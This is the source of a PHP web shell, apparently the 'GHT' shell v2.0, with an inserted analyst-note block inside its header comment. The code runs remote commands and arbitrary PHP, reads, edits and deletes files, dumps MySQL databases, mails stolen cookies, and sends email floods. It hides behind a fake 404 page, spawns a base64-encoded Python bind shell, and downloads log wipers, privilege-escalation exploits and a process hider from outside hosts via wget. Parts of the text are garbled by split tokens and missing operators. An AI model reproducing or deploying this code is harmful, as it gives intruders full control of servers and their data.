
<?php /* ###################################################################### # [GHT]FiSh presents: # # by GHT # ############################DOCUMENTATION############################# #To execute commands, simply include ?cmd=___ in the url.
# ---------------------------------------------------------------------
# ANALYST NOTE (added during review; not part of the original script)
# This file is a PHP web shell. Its own header documents remote command
# execution through a "cmd" query parameter and a "cookie" parameter;
# the $email setting is commented as the address cookies are sent to.
# Parameters read by the start-up code that follows this header:
#   GET: cmd, act, dir      POST: contents, gf
# The GET names can serve as search terms in web-server access logs.
# POST bodies are usually not logged, so a lack of hits does not show
# that the file was never used.
# Shipped configuration: $auth = 0, which the VERIFICATION LEVELS table
# describes as no protection. $user and $pass are commented as MD5
# values but hold plain strings, not 32-character hex digests.
# The start-up code calls split(), which was removed in PHP 7.0, so
# this copy was written for PHP 5 or older. NOTE(review): do not take
# the PHP version of a host as evidence that the file never ran there.
# A "dir" value of 'nullz' skips cleandir(); the reason is not visible
# in this section.
# Handling: as the NOTE TO ADMINISTRATORS says, finding this file on a
# server without approval is an indicator of compromise. Preserve the
# file and the logs for analysis before removing it.
# ---------------------------------------------------------------------
# #Ex: http://site.com/shl.php?cmd=whoami # # # #To steal cookies, use ?cookie=___ in the url. # #Ex: <script>document.location.href= # #'http://site.com/shl.php?cookie='+document.cookies</script> # # # #In the AJAX command shell, type 'home' to return to the shell's # #directory. Type 'clear' to clear the output screen. # ##########################VERIFICATION LEVELS######################### #0: No protection; anyone can access # #1: User-Agent required # #2: Require IP # #3: Basic Authentication # ##############################KNOWN BUGS############################## #The SQL tool is NOT complete. There is currently no editing function# #available. Some time in the future this may be fixed, but for now # #don't complain to me about it # ################################SHOUTS################################ #pr0be - Beta testing & CSS # #TrinTiTTY - Beta testing # #clorox - Beta testing # #Everyone else at g00ns.net # ########################NOTE TO ADMINISTRATORS######################## #If this script has been found on your server without your approval, # #it would probably be wise to delete it and check your logs. # ###################################################################### */ // Configuration $auth = 0; $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell $email = ""; // E-mail address where cookies will be sent $user = "GHT { Lito , Mr.Ps ,MR>Killer"; // MD5 encoded User $pass = "GHT"; // MD5 encoded Password // Global Variables $version = '2.0'; $self = $_SERVER['PHP_SELF']; $soft = $_SERVER['SERVER_SOFTWARE']; $servinf = split('[:]', $_SERVER['HTTP_HOST']); $servip = $servinf[0]; $servport = @$servinf[1] ? 
$servinf[1] : '80'; $cmd = @$_GET['cmd']; $act = @$_GET['act']; $cmd = @$_GET['cmd']; $curdir = cleandir(getcwd()); if(@$_GET['dir']){ $dir = $_GET['dir']; if($dir != 'nullz') $dir = cleandir($dir); } $contents = @$_POST['contents']; $gf = @$_POST['gf'];

$img = @$_GET['img']; // Credits to disruptiv for this bit ;) if(count(get_included_files()) > 1 count(get_included_files()) > 1) list($me) = explode("&", $_SERVER['REQUEST_URI']); else $me = $PHP_SELF . "?"; @session_start(); @set_time_limit(5); switch($auth){ // Authentication switcher case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey) hide(); break; case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)) hide(); break; case 3: if(!$_SERVER['PHP_AUTH_USER']) userauth(); break; default: break; } function cleandir($d){ // Function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\\\", "\\", $d); $d = str_replace("////", "//", $d); return($d); } function userauth(){ // Basic authentication function global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if(md5($_SERVER['PHP_AUTH_USER']) != $user md5($_SERVER['PHP_AUTH_PW'] != $pass)) hide(); } function get_exec_function(){ // Command execution method finder $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru") ; $disabled_funcs = ini_get('disable_functions'); foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) ret urn $f; } function execute_command($exec_function, $command){ // Command execution functio n switch($exec_function){ case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h) ); break; case "exec": exec($command, $result); foreach($result as $r) echo($r . " \n"); break; case "shell_exec": echo(shell_exec($command)); break; case "system": system($command); break; case "passthru": passthru($command); break; } } if(!$act && !$cmd && !@$_GET['cookie'] && !@$_GET['f'] && !@$dir && !$gf && !$im g && !@$_GET['ajxcmd']) main(); elseif(!$act && $cmd){ // Raw command execution style(); echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>"); if($exec_function = get_exec_function()) execute_command($exec_function, $cm d); else die("All execution methods disabled.</textarea>"); echo("</textarea>"); }

elseif(@$_GET['ajxcmd']){ // Command execution for AJAX shell if($_GET['ajxcmd'] == "home") $_SESSION['work_dir'] = getcwd(); elseif($exec_function = get_exec_function()){ if(strpos($_GET['ajxcmd'], 'cd') === 0){ $c = array_pop(explode(" ", $_GET['ajxcmd'])); if(@is_dir($_SESSION['work_dir'] . DIRECTORY_SEPARATOR . $c) && $c[0 ] != '\\' && $c[0] != '//') $_SESSION['work_dir'] .= DIRECTORY_SEPARATOR . $c; elseif(@is_dir($c) && $c[0] != '.') $_SESSION['work_dir'] = $c; else echo("Invalid directory\n"); } else{ @chdir($_SESSION['work_dir']); execute_command($exec_function, $_GET['ajxcmd']); } } else die("All execution methods disabled."); } elseif(@$_GET['cookie']){@mail($email, "Cookie Data", @$_GET['cookie'], "From: $ email"); hide();} // Cookie stealer function elseif($act == 'view' && @$_GET['f'] && $dir) view($_GET['f'], $dir); elseif($img) img($img); elseif($gf) grab($gf); elseif(@$dir) files($dir); else{ switch($act){ case 'phpinfo': phpinfo();break; case 'sql': sql();break; case 'files': files(@$dir);break; case 'email': email();break; case 'cmd': cmd();break; case 'upload': upload();break; case 'tools': tools();break; case 'sqllogin': sqllogin();break; case 'sql': sql();break; case 'lookup': lookup();break; case 'kill': kill();break; case 'phpexec': execphp();break; case 'bshell': bshell();break; default: main();break; } } function hide(){ // Hiding function global $self, $soft, $servip, $servport; header("HTTP/1.0 404 Not Found"); ?> <!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1 align="center"><font size="3" face="Tahoma">GHT GAZA HACKER TEAM</font></H 1> <p align="center">All By Lito Mr.PS MR&gt;Killer</p> <H1>Not Found</H1> The requested URL <?php echo($self); ?> was not found on this server.<P> <P>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request . <HR> <ADDRESS><?php echo($soft . "Server at " . $servip . " Port " . $servport); ?></

ADDRESS> </BODY></HTML> <?php die(); } function style(){ // Style / header function global $servip,$version; ?> <html> <head> <title>All By GHT WWW.HACKER.PS shell v.<?php echo($version . "-" . $servip); ?> </title> <style> body { background-color:#000000; color:white; font-family:Verdana; font-size:11p x; } h1,h3 { color:white; font-family:Verdana; font-size:11px; } input,textarea,select,button { color:#FFFFFF; background-color:#000000; border:1 px solid #4F4F4F; font-family:Verdana; font-size:11px; } textarea { font-family:Courier; } a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; } a:hover { color:#7F7F7F; } td { font-size:12px; vertical-align:middle; } th { font-size:13px; vertical-align:middle; } table { empty-cells:show; } .inf { color:#7F7F7F; } </style> </head> <?php } function main(){ // Main/menu function global $me, $self, $servip, $servport, $soft, $version; style(); $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP i nfo', 'phpexec'=>'PHP Execute', 'tools'=>'Tools','sqllogin'=>'SQL','upload'=>'Get Files','kill'=>'Kill Shell '); $capt = array_flip($act); echo("<form method='GET' name='shell'>\n"); echo("<b>Host: <span class='inf'>$servip</span></b><br>\n"); echo("<b>Server software: <span class='inf'>$soft</span></b><br>\n"); echo("<b>Uname: <span class='inf'>" . php_uname() . "</span></b><br>\n"); echo("<b>Shell Directory: <span class='inf'>" . getcwd() . "</span></b><br>\ n"); echo("<div style='display:none' id='info'>\n"); echo("<b>Current User: <span class='inf'>" . @exec('whoami'). "</span></b><b r>\n"); echo("<b>ID: <span class='inf'>" . @exec('id') . "</span></b><br>\n"); echo("<b>Safemode: " . (@ini_get('safe_mode') ? "<font color='red'>ON</font> " : "<font color='green'>OFF</font><br>\n") . "</b>"); echo("<b>Open Base Dir: " . (@ini_get('open_basedir') != '' ? "[ <span class ='inf'>" . ini_get('open_basedir') . "</span> ]" : "<font color='green'>OFF</fon t>") . 
"</b><br>\n"); echo("<b>Disabled functions: <span class='inf'>" . (@ini_get('disable_functi ons') != '' ? @ini_get('disable_functions') : "None") . "</span></b><br>\n"); echo("<b>MySQL: " . (@function_exists(mysql_connect) ? "<font color='green'> ON</font>" : "<font color='red'>OFF</font>") . "</b>"); ?> </div>

<a href="#" onClick="document.getElementById('info').style.display = 'block';">M ore</a> <a href="#" onClick="document.getElementById('info').style.display = 'none';">Le ss</a> </html> <H1 align="center"><font size="3" face="Tahoma">GHT GAZA HACKER TEAM</font></H 1> <p align="center">All By Lito Mr.PS MR&gt;Killer</p> <p align="center"> <html> </p> <center> <h3 align='center'>Links</h3> <?php foreach($act as $link) echo("[ <a href='" . $me . "&act=" . $capt[$link] . " ' target='frm'>" . $link . "</a> ] "); ?> </center> <hr> <br><iframe name='frm' style='width:100%; height:65%; border:0;' src='<?php echo ($me . "&act=files"); ?>'></iframe> <pre style='text-align:center'>:: GHT WWW.HACKER.PS shell <font color='red'>v<?p hp echo($version); ?></font> ::</pre> <?php die(); } function cmd(){ // Command execution function global $me; style(); ?> <script> var http = null; function char(e){ if(window.event) k = e.keyCode; else if(e.which) k = e.which; if(k == 13){ cmd = document.getElementById('c').value; if(cmd == "clear") document.getElementById('history').value = ""; else if(document.getElementById('c').value != "") exec(cmd); document.getElementById('c').value = ""; } } function exec(cmd){ if (window.XMLHttpRequest) http = new XMLHttpRequest(); else if (window.ActiveXObject) http = new ActiveXObject("Microsoft.XMLHTTP") ; if(http){ http.onreadystatechange = handle_response; http.open("GET", "<?php echo($me . "&ajxcmd="); ?>" + cmd, true); http.send(null); } else alert("Your browser fails."); } function handle_response(){ if(http.readyState == 4) document.getElementById('history').value += "# " + cmd + "\n" + http.responseText; document.getElementById('history').scrollTop = document.getElementById('hist ory').scrollHeight; } </script> </head>

<body onLoad="document.getElementById('c').focus(); document.getElementById('his tory').scrollTop = document.getElementById('history').scrollHeight;"> <input type="text" id="c" onKeyDown="char(event);" style="width:100%; border:1px solid #1F1F1F;"><br><textarea id="history" style="width:100%; height:90%; borde r:0px; overflow: auto;"></textarea> </body></html> <?php } function execphp(){ // PHP code execution function style(); echo("<h4>Execute PHP Code</h4>"); echo("<form method='POST'>"); echo("<textarea name='phpexec' rows=5 cols=100>"); if(!@$_POST['phpexec']) echo("/*Don't include <? ?> tags*/\n"); echo(stripslashes(htmlentities(@$_POST['phpexec'])) . "</textarea>\n<br>\n") ; echo("<input type='submit' value='Execute'>"); echo("</form>"); if(@$_POST['phpexec']){ echo("<textarea rows=10 cols=100>"); eval(stripslashes($_POST['phpexec'])); echo("</textarea>"); } } function sqllogin(){ // MySQL login function global $me; if(@$_SESSION['isloggedin'] == "true") header("Location: " . $me . "&act=sql"); if(@$_POST['un'] && @$_POST['pw']) header("Location: " . $me . "&act=sql"); style(); ?> <form method='post'> User:<br><input type='text' name='un' size='30'><br> Password:<br><input type='text' name='pw' size='30'><br> Host:<br><input type='text' name='host' size='30' value='localhost'><br> Port:<br><input type='text' name='port' size='30' value='3306'><br> <input type='submit' value='Login'> </form> <?php die(); } function sql(){ // General SQL Function global $me; if(!@$_GET['sqlf']){style();} if(@$_POST['un'] && $_POST['pw']){; $_SESSION['sql_user'] = $_POST['un']; $_SESSION['sql_password'] = $_POST['pw']; } $_SESSION['sql_host'] = @$_POST['host'] ? $_POST['host'] : 'localhost'; $_SESSION['sql_port'] = @$_POST['port'] ? $_POST['port'] : '3306'; if(@$_SESSION['sql_user'] && @$_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . 
$_SESSION['s ql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['s ql_host'], $_SESSION['sql_port']);

echo("Invalid credentials<br>\n"); die(sqllogin()); } else $_SESSION['isloggedin'] = "true"; } else die(sqllogin()); if (@$_GET['db']){ mysql_select_db($_GET['db'], $sqlcon); if(@$_GET['sqlquery']){ $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()) ; $num = mysql_num_rows($dat); for($i=0;$i<$num;$i++) echo(mysql_result($dat, $i) . "<br>\n"); } else if(@$_GET['table'] && !@$_GET['sqlf']){ echo("<a href='" . $me . "&act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins" . "'>Insert Row</a><br><br>\n"); echo("<table border='1'>"); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("<th>" . $fields[$i]); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y=0; for($x=1;$x<=$num_rows+1;$x++){ if(!@$_GET['p']) $_GET['p'] = 1; if(@$_GET['p']){ if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ echo("<tr>"); for($i=0;$i<count($fields);$i++){ $query = "SELECT " . $fields[$i] . " FROM " . $_GET[ 'table'] . " WHERE " . $fields[0] . " = '" . $x . "'"; $dat = mysql_query($query, $sqlcon) or die(mysql_err or()); while($row = mysql_fetch_row($dat)) echo("<td>" . $row[0] . "</td>"); } echo("</tr>\n"); } } $y++; } echo("</table>\n"); for($z=1;$z<=ceil($num_rows / 30);$z++){ echo("<a href='" . $me . "act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> "); } }

elseif(@$_GET['table'] && @$_GET['sqlf']){ switch($_GET['sqlf']){ case "dl": sqldownload();break; case "ins": sqlinsert();break; default: $_GET['sqlf'] = ""; } } else{ echo("<table>"); $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) echo("<tr><td><a href='" . $me . "&act=sql&db=" . $_GET['db'] . "&table=" . $row[0] . "'>" . $row[0] . "</a></td><td>[<a href='" . $me . "&act=s ql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl" . "'>Download</a>]</td>< /tr>\n"); echo("</table>"); } } else{ $dbs=mysql_list_dbs($sqlcon); while($row = mysql_fetch_object($dbs)) echo("<a href='" . $me . "&act=sql&db=" . $row->Database . "'>" . $r ow->Database . "</a><br>\n"); } mysql_close($sqlcon); } function sqldownload(){ // Download sql file function $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'] , $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mys ql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for($x=1;$x<$num_rows;$x++){ $out .= "("; for($i=0;$i<count($fields);$i++){ $out .= "'"; $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHE RE " . $fields[0] . " = '" . $x . "'"; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while($row = mysql_fetch_row($dat)){ if($row[0] == "") $row[0] = "NULL"; if($i != count($fields)-1) $out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', "; else $out .= $row[0]. "'"; } } $out .= ");\n"; }

$filename = @$_GET['table'] . '-' . time() . '.sql'; header("Content-type: application/octet-stream"); header("Content-length: " . strlen($out)); header("Content-disposition: attachment; filename=$filename;"); echo($out); die(); } function sqlinsert(){ style(); $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'] , $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); if(@$_POST['ins']){ unset($_POST['ins']); $fields = array_flip($_POST); print_r($_POST); $f = implode(",", $fields); $v = implode("','", $_POST); $query = "INSERT INTO " . $_GET['table'] . " (" . $f . ") VALUES ('" . $ v . "')"; echo($query); mysql_query($query, $sqlcon) or die("MYSQL ERROR: " . mysql_error()); die("Row inserted.<br>\n<a href='" . $me . "&act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>"); } $query = "SHOW COLUMNS FROM " . @$_GET['table']; $result = mysql_query($query, $sqlcon) or die("MYSQL ERROR: " . mysql_error( )); $i = 0; $fields = array(); echo("<form method='POST'>"); echo("<table>"); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n"); $i++; } echo("</table>"); echo("<br>\n<input type='submit' value='Insert' name='ins'>"); echo("</form>"); } function nicesize($size){ if(!$size) return "0 B"; if ($size >= 1073741824) return(round($size / 1073741824) . " GB"); elseif ($size >= 1048576) return(round($size / 1048576) . " MB"); elseif ($size >= 1024) return(round($size / 1024) . " KB"); else return($size . " B"); } function files($dir){ // File manipulator function global $me, $self, $curdir; style(); if($dir=="") $dir = $curdir; $dirx = explode(DIRECTORY_SEPARATOR, $dir); $files = array(); $folders = array(); echo("<form method='GET'>");

echo("<input type='text' name='dir' value='$dir' size='40'>"); echo("<input type='submit' value='Go'>"); echo("</form>"); echo("<h4>File list for "); for($i=0;$i<count($dirx);$i++){ @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR; echo("<a href='" . $me . "&dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTO RY_SEPARATOR); } echo("</h4>"); echo("<table>"); echo("<th>File Name<th>File Size</th>"); if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array(); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "for estgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "<a href='$me&dir=$dir" . DIRECTORY_SEPARATOR . "$link'><font color='$color'>$link</font></a>"; @$file['icon'] = "folder"; $folder = "<img src='" . $me . "&img=" . $file['icon'] . "'>&nbs p;". $file['link']; array_push($folders, $folder); } else{ $file = array(); $ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) : ""; $file['size'] = nicesize(@filesize($dir . DIRECTORY_SEPARATOR . $link)); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "for estgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? 
"gold" : "red"); @$file['link'] = "<a href='$me&act=view&f=$link&dir=$dir'><font color='$color'>$link</font></a>"; switch($ext){ case 'exe': case 'com': case 'jar': case '': $file['icon']=' binary'; break; case 'jpg': case 'gif': case 'png': case 'bmp': $file['icon' ]='image'; break; case 'zip': case 'tar': case 'rar': case 'gz': case 'cab': c ase 'bz2': case 'gzip': $file['icon']='compressed'; break; case 'txt': case 'doc': case 'pdf': case 'htm': case 'html': case 'rtf': $file['icon']='text'; break; case 'wav': case 'mp3': case 'mp4': case 'wma': $file['icon' ]='sound'; break; case 'js': case 'vbs': case 'c': case 'h': case 'sh': case ' pl': case 'py': case 'php': case 'h': $file['icon']='script'; break; default: $file['icon'] = 'unknown'; break; } $file = "<tr><td><img src='" . $me . "&img=" . $file['icon'] . " ' height='18' width='18'>&nbsp;". $file['link'] . "<td>" . $file['size'] . "</td ></tr>\n"; array_push($files, $file); } } foreach($folders as $folder) echo("<tr><td>$folder</td><td>DIR</td></tr> \n"); foreach($files as $file) echo($file); echo("</table>");

closedir($handle); } } function email(){ // Email bomber function global $me; style(); ?> <form method='POST' action='<?php echo("$me&act=email"); ?>'> <b>Your address:</b><br> <input name='from' type='text' size='35'><br> <b>Their address:</b><br> <input name='to' type='text' size='35'><br> <b>Subject:</b><br> <input name='subject' type='text' size='35'><br> <b>Text:</b><br> <input name='body' type='text' size='35'><br> <b>How many times:</b><br> <input name='times' type='text' size='5'><br><br> <input name='submit' type='submit' value='Submit'> </form> <?php if (@$_POST['to'] && @$_POST['from']){ $headers = "From: " . $_POST['from']; for($i=0; $i<@$_POST['times']; $i++){ @mail(@$_POST['to'], @$_POST['subject'], @$_POST['body'], $headers) or die("Mail could not be sent"); } echo("Mail sent"); } } function view($filename, $dir){ // File view function global $me; if(@$_POST['fileact'] == "Download"){ header("Content-type: application/octet-stream"); header("Content-length: " . strlen($_POST['contents'])); header("Content-disposition: attachment; filename=" . basename($filename ) . ";"); $handle = @fopen($filename, "r"); echo(@fread($handle, filesize($filename))); die(); } style(); if(@$_POST['contents'] && @$_POST['fileact'] == "Save"){ $handle = @fopen($filename, 'w'); fwrite($handle, stripslashes($_POST['contents'])); fclose($handle); echo("Saved file.<br><br>"); echo("<a href='$me&act=view&f=$filename&dir=nullz'>Go back</a>"); die(); } elseif(@$_POST['fileact'] == "Delete"){ unlink($filename); echo("Deleted file.<br><br>"); echo("<a href='$me&act=files'>Go back</a>"); die(); } if($dir != "nullz") $filename = $dir . DIRECTORY_SEPARATOR . $filename; // h

eh $file = @fopen($filename, 'r'); $content = @fread($file, @filesize($filename)); echo("<form name='file' method='POST' action='$me&act=view&dir=$dir&f=$filen ame'>"); echo("<textarea style='width:100%; height:92%;' name='contents'>"); echo(htmlentities($content) . "\n"); ?> </textarea> <input name='fileact' type='submit' value='Save'> <input name='fileact' type='submit' value='Delete'> <input name='fileact' type='submit' value='Download'> </form> <?php } function upload(){ // Uploading frontend function global $curdir; style(); ?> <form name='files' enctype='multipart/form-data' method='POST'> <b>Output Directory</b><br> <input type='text' name='loc' size='65' value='<?php echo($curdir); ?>'><br><br> <b>Remote Upload</b><br> <input type='text' name='rem' size='65'> <input type='submit' value='Grab'><br><br> <b>Local File Upload</b><br> <input name='up' type='file' size='65'> <input type='submit' value='Upload'> </form><br> <?php if(@$_POST['rem']) grab($_POST['rem']); if(@$_FILES['up']) up($_FILES['up']); } function up($up){ // Uploading backend funciton style(); $updir = @$_POST['loc']; move_uploaded_file($up['tmp_name'], $updir . DIRECTORY_SEPARATOR . $up['name ']); die("File has been uploaded."); } function grab($file){ // Uploading backend function style(); $updir = @$_POST['loc']; $filex = array_pop(explode(DIRECTORY_SEPARATOR, $file)); if(exec("wget $file -b -O $updir" . DIRECTORY_SEPARATOR . $filex)) die("File has been uploaded."); else die("File upload failed."); } function tools(){ // Useful tools function global $me, $curdir; style(); $tools = array( "--- Log wipers ---"=>"1", "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/v anish2.tgz", "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak

.c", "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0s t.sh", "--- Priv Escalation ---"=>"2", "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", "--- Bindshells ---"=>"3", "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshe ll-1.6.perl", "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bind shell-unix", "--- Misc ---"=>"4", "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/moc ks/mocks-0.0.2.tar.gz", "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/u nix-tools/xps.c"); $names = array_flip($tools); echo("<form method='post'>"); echo("<b>Output Directory</b><br>"); echo("<input type='text' name='loc' size='65' value='$curdir'><br><br>"); echo("<select name='gf' style='align:center;'>"); foreach($tools as $tool) echo(is_numeric($tool) ? 
"<optgroup label='$names[$tool]'>\n" : "<optio n value='$tool'>$names[$tool]</option>\n"); echo("</select>"); echo("<br><input type='submit' value='Grab'>"); echo("</form>"); echo("<br>"); echo("<a href=$me&act=bshell>Bindshell</a> (requires writable directory)<br> \n"); echo("<a href=$me&act=lookup>List domains</a> (requires writable directory)< br>\n"); echo("<a href=$me&act=email>E-mail bomber</a><br>\n"); } function lookup(){ // Domain lookup function global $servinf; style(); $script = "import urllib, urllib2, sys, re req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlen code({'domainname' : sys.argv[1]})) site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read()) for i in xrange(0,len(site)): print site[i]"; // My sexy python script $handle = fopen('lookup.py', 'w'); @fwrite($handle, $script); @fclose($handle); echo("<h4>Domains</h4>"); echo("<ul>"); $cmd = exec("python lookup.py $servinf[0]", $ret); foreach($ret as $site) echo("<li>$site\n"); echo("</ul>"); @unlink('lookup.py'); } function bshell(){ // Python bindshell script style(); if(!@$_POST['bport']){ ?> <form method = POST>

<b>Port: </b> <input type = 'text' name = 'bport' value = '5001'> <input type = 'submit' value = 'Bind'> </form> <?php die(); } $script = "IyEvdXNyL2Jpbi9lbnYvcHl0aG9uDQppbXBvcnQgc3lzLHNvY2tldCxvcw0KZGVmI GJpbmRtZShwb3J0KToNCiAgcy A9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkNCiAgdH J5Og0KICAgIHMuYmluZCgoJyc saW50KHBvcnQpKSkNCiAgICBzLmxpc3Rlbig1KQ0KICBleGNlcHQ6DQogICAgc3lzLmV4aXQoJ0N hbm5vdCBjcmVhdGUgc29ja2V0 JykNCiAgdW4gPSBvcy5lbnZpcm9uWyJMT0dOQU1FIl0NCiAgaWYgdW4gPT0gJ3Jvb3QnOiBwcm9t cHQ9JyAjICcNCiAgZWxzZTogc HJvbXB0PScgJCAnDQogIHdoaWxlIFRydWU6DQogICAgYywgZGV0YWlscyA9IHMuYWNjZXB0KCkNC iAgICBjLnNlbmQoIldlbGNvbW UgdG8gdGhlIHNlcnZlciA7KVxuU2hlbGwga2lsbCBjb21tYW5kIGlzICdkaWUnLlxuIikNCiAgIC B3aGlsZSBUcnVlOg0KICAgICA gdHJ5Og0KICAgICAgICBjLnNlbmQodW4gKyAnQCcgKyBzb2NrZXQuZ2V0aG9zdG5hbWUoKSArICc gJyArIG9zLmdldGN3ZCgpICsg cHJvbXB0KQ0KICAgICAgICBkYXQgPSBjLnJlY3YoNDA5NikucnN0cmlwKCkNCiAgICAgICAgaWYg ZGF0WzA6Ml0gPT0gJ2NkJzoNC iAgICAgICAgICBvcy5jaGRpcihkYXRbMzpdKQ0KICAgICAgICBpZiBkYXRbMDozXSA9PSAnZGllJ zoNCiAgICAgICAgICBvcy5wb3 Blbigna2lsbCAnICsgc3RyKG9zLmdldHBpZCgpKSkNCiAgICAgICAgYy5zZW5kKG9zLnBvcGVuKG RhdCkucmVhZCgpLnJzdHJpcCg pICsgJ1xuJykNCiAgICAgIGV4Y2VwdCBzb2NrZXQuZXJyb3I6DQogICAgICAgIHMuY2xvc2UoKQ0 KICAgICAgICBiaW5kbWUocG9y dCkNCiAgICBjLmNsb3NlKCkNCmlmIG9zLmZvcmsoKToNCiAgc3lzLmV4aXQoMCkNCmJpbmRtZShp bnQoc3lzLmFyZ3ZbMV0pKQ=="; $handle = fopen('b.py', 'w'); @fwrite($handle, base64_decode($script)); @fclose($handle); exec("python b.py " + $_POST['bport']); @unlink("b.py"); } function img($img){ // Images function $images = array( "folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAA AAAAAAAAAAAAAAAACH5BAEAAA" . "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4 YRYPB2DOlHPiKwq" . "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAA AAAAAAAAAAAAAAACH+TlRoaX" . 
"MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY 29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNr YNssGsBy/4GsX6y" . "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHC H95NwMHV4SGh4Ed" . "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7", "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0 IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBA AABACwAAAAAFAAW" . "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7Sx LE+sI+9V8vycFiM" .

